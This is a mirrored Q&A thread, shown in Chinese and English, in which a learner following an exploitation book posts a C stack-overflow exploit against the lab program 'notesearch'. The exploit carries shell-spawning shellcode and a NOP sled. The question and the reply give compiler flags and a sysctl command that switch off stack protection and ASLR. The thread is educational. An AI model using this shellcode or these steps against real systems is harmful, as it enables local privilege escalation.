在 Ubuntu 11.04 中禁用堆栈崩溃保护

发布于 2024-11-05 07:08:44 字数 1416 浏览 0 评论 0原文

我在 2007 年 MacBook 上运行 32 位 Ubuntu 11.04，并且刚刚开始了解缓冲区溢出漏洞。我正在尝试运行书中的示例程序，但 Ubuntu 的安全措施使我无法成功执行缓冲区溢出。这是我尝试运行的代码：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

我希望此代码会导致段错误，但每次运行它时，它都会因错误“检测到堆栈粉碎”而退出。我尝试使用以下选项进行编译（使用 gcc）：

-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack

各种组合以及全部组合。我还尝试过 $ sysctl -w kernel.randomize_va_space=0 然后重新编译，但没有成功。

鉴于 Ubuntu 的内置安全措施，如果有人能够阐明执行缓冲区溢出的正确方法，我们将不胜感激

原文

I'm running 32-bit Ubuntu 11.04 on a 2007 MacBook, and I'm just starting to learn about buffer overflow exploits. I'm trying to run the example programs from a book, but Ubuntu's security measures are making it impossible for me to successfully execute a buffer overflow. Here's the code I'm attempting to run:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 

   strcat(command, "\'");

   system(command); // run exploit
   free(command);
}

I would like this code to result in a segfault, but every time I run it, it quits with the error "stack smashing detected". I've tried compiling (using gcc) with the following options:

-fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack

in various combinations, as well as all together. I've also tried $ sysctl -w kernel.randomize_va_space=0 followed by a recompile, with no success.

It would be much appreciated if anyone could shed light on the correct way to execute a buffer overflow, given Ubuntu's built-in security measures

分享到QQ

分享到微博

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

需要登录才能够评论，你可以免费注册一个本站的账号。

一身仙ぐ女味 2024-11-12 07:08:44

我对现在发生的事情有了更多的了解。给定的代码构造一个缓冲区，然后将其传递给一个名为 notesearch 的程序，该程序存在缓冲区溢出漏洞。我不知道如何在当前版本的 ubuntu 上禁用保护措施，但我尝试的方法在我的 Ubuntu 9.10 虚拟机上有效。也就是说，-fno-stack-protector 用作 gcc 标志，并且当与 sysctl kernel.randomize_va_space=0 配对时，允许在堆栈上执行 shellcode 的缓冲区溢出。这是一种解决方法，但运行我的虚拟机非常适合我，并且允许我继续完成本书中的示例。如果您有兴趣学习漏洞利用，这是一本很棒的书。这里

回复收藏 0 原文